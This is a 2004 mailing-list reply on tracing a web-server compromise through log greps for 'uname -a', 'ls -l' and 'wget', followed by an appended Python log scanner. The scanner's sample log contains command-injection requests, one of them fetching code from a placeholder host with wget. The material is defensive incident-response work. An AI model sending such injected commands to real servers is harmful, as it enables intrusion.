On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.net or Google
easily.
[snip]
> I need to find the vulnerable code on this box. And I have no idea
> where to begin.
> I've tried running virus scans, nothing is infected.
>
>
[snip]
The files you found within /tmp - Grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
"uname -a", "ls -l", "wget", remembering you may need to substitute a
space for %20:
# grep -i 'uname%20-a' {access,error}.log
# grep -i 'wget' {access,error}.log
How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?
HTH.
David.
--
.''`. David Ramsden <david@hexstream.eu.org>
: :' : http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
`- Debian - when you have better things to do than to fix a system.
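As an added example (not David's code or anything from the thread): a Python pass over Apache access_log entries that applies the greps suggested above after percent-decoding the request line, so "uname%20-a", "uname+-a" and double-encoded "%2520" variants are all caught. The log lines and the /tmp file name a.out are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus
# Constructed Apache combined-log sample (not from the original thread); a.out stands
# in for whatever file name was found in /tmp on the box.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jun/2004:02:10:11 +1000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Jun/2004:02:12:44 +1000] "GET /cgi-bin/view.php?cmd=uname%20-a HTTP/1.1" 200 98 "-" "curl/7.10"
10.0.0.7 - - [15/Jun/2004:02:13:02 +1000] "GET /cgi-bin/view.php?cmd=wget%2520http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 0 "-" "curl/7.10"
10.0.0.7 - - [15/Jun/2004:02:13:30 +1000] "GET /cgi-bin/view.php?cmd=ls+-l+/tmp/a.out HTTP/1.1" 200 331 "-" "curl/7.10"
"""

# Client address, timestamp and the quoted request line of a combined-format entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# The strings the thread suggests grepping for; matched after decoding, so that
# "uname -a", "uname%20-a" and "uname+-a" all hit.
INDICATORS = {
    "uname -a": re.compile(r"uname\s+-a", re.I),
    "ls -l": re.compile(r"\bls\s+-l", re.I),
    "wget": re.compile(r"\bwget\b", re.I),
}

def decode_request(raw, rounds=3):
    """Percent-decode until stable (bounded) so %20 and double-encoded %2520 both
    become a space; '+' is treated as a space too, as in form-encoded queries."""
    cur = raw
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur

def scan_log(log_text, tmp_names=()):
    """One finding per line whose decoded request contains an indicator or a /tmp file name."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:  # error_log lines have a different layout; grep those separately
            continue
        decoded = decode_request(m.group("req"))
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        hits += ["tmp:" + n for n in tmp_names if n in decoded]
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "request": decoded, "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, ["a.out"]):
        print(f["ts"], f["ip"], f["hits"], f["request"])
```

Run it against the real access_log by reading the file into scan_log and passing the actual /tmp file names; each finding gives the client address and timestamp to pivot on.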